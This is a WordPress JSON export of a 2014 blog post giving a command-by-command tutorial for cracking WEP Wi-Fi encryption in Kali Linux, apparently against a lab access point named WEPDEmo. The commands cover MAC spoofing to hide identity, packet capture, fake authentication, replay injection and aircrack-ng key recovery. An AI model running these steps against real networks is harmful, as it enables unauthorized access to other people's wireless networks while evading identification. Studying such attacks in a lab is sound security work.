{"id":50,"date":"2014-11-05T15:05:35","date_gmt":"2014-11-05T21:05:35","guid":{"rendered":"http:\/\/sinjinsmith.net\/?p=50"},"modified":"2016-03-23T09:08:37","modified_gmt":"2016-03-23T14:08:37","slug":"cracking-wep-encryption","status":"publish","type":"post","link":"https:\/\/sinjinsmith.net\/?p=50","title":{"rendered":"Cracking WEP Encryption"},"content":{"rendered":"<p>Cracking WEP in Kali Linux 2.0 has become extrememly easy.\u00a0 Open WiFite from the Applications menu and at the prompt type:<\/p>\n<blockquote><p>wifite &#8211;wep<\/p><\/blockquote>\n<p>Follow the onscreen instructions and the work is done for you.<\/p>\n<p>&nbsp;<\/p>\n<p>WEP cracking instructions for Kali Linux 1.0<\/p>\n<p>&gt;&gt;&gt;Open a new terminal window<\/p>\n<blockquote><p>airmon-ng<\/p><\/blockquote>\n<p># Will show you a list of your available wireless interfaces<br \/>\n# Note the name of your wireless interface, normally wlan0 or mon0<\/p>\n<blockquote><p>airmon-ng stop wlan0<\/p><\/blockquote>\n<p># Stops the airmon-ng daemon<\/p>\n<blockquote><p>ifconfig wlan0 down<\/p><\/blockquote>\n<p># stops the wireless interface<\/p>\n<blockquote><p>macchanger &#8211;mac 00:11:22:33:44:55 wlan0<\/p><\/blockquote>\n<p># Spoofs your MAC address to hide your identity<\/p>\n<blockquote><p>airmon-ng start wlan0<\/p><\/blockquote>\n<p># Starts the airmon-ng daemon<\/p>\n<blockquote><p>airodump-ng wlan0<\/p><\/blockquote>\n<p># Locate available wireless access points to attack<br \/>\n# For our lab, look for WEPDEmo and note BSSID(MAC) and channel<\/p>\n<blockquote><p>airodump-ng -c 6 -w wepdemoattack &#8211;bssid 20:AA:4B:8B:A4:6E wlan0<\/p><\/blockquote>\n<p># Start monitoring WEPDEmo for for associations to attempt to crack<br \/>\n# -c 6 specifies the channel<br \/>\n# -w wepdemoattack specifies the name of the file to save as<br \/>\n# &#8211;bssid 20:AA:4B:8B:A4:6E the MAC of the access point you are attacking<br \/>\n# wlan0 the wireless card you are monitoring with<\/p>\n<p>&gt;&gt;&gt;&gt;Open a new terminal window<\/p>\n<blockquote><p>aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0<\/p><\/blockquote>\n<p># Attempt to associate with the wireless access point<br \/>\n# -1 0 This is the number 1 and specifies the type of attack, fake authentication and\u00a0\u00a0\u00a0 # delay<br \/>\n# -a is the MAC of the access point being attacked<br \/>\n# -h is the spoofed MAC of our system<br \/>\n# -e is the access points SSID<br \/>\n# wlan0 is the interface we are attacking with<\/p>\n<blockquote><p>aireplay-ng -3 -b 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 wlan0<\/p><\/blockquote>\n<p>#Will send traffic to the access point and monitor<\/p>\n<blockquote><p>aircrack-ng -b 20:AA:4B:8B:A4:6E wepdemoattack-01.cap<\/p><\/blockquote>\n<p># Will attempt to crack the WEP encryption that has been detected so far<br \/>\n# Will check as you run it and then every 5000 ISVs &#8211; listed as #Data on the airodump\u00a0\u00a0\u00a0 # terminal<br \/>\n&gt;&gt;&gt;&gt;Open a new terminal window<\/p>\n<blockquote><p>aireplay-ng -1 0 -a 20:AA:4B:8B:A4:6E -h 00:11:22:33:44:55 -e WEPDEmo wlan0<\/p><\/blockquote>\n<p>#Repeatedly run this to attempt to generate more traffic to speed up the attack<br \/>\nEventually on the aircrack-ng screen you should see the correct WEP key<\/p>\n<p>26:27:F6:85:97 for my demo<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cracking WEP in Kali Linux 2.0 has become extrememly easy.\u00a0 Open WiFite from the Applications menu and at the prompt type: wifite &#8211;wep Follow the onscreen instructions and the work is done for you. &nbsp; WEP cracking instructions for Kali Linux 1.0 &gt;&gt;&gt;Open a new terminal window airmon-ng # Will show you a list of [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,9],"tags":[],"class_list":["post-50","post","type-post","status-publish","format-standard","hentry","category-linux","category-security"],"_links":{"self":[{"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/posts\/50","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=50"}],"version-history":[{"count":3,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/posts\/50\/revisions"}],"predecessor-version":[{"id":102,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/posts\/50\/revisions\/102"}],"wp:attachment":[{"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=50"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=50"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=50"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}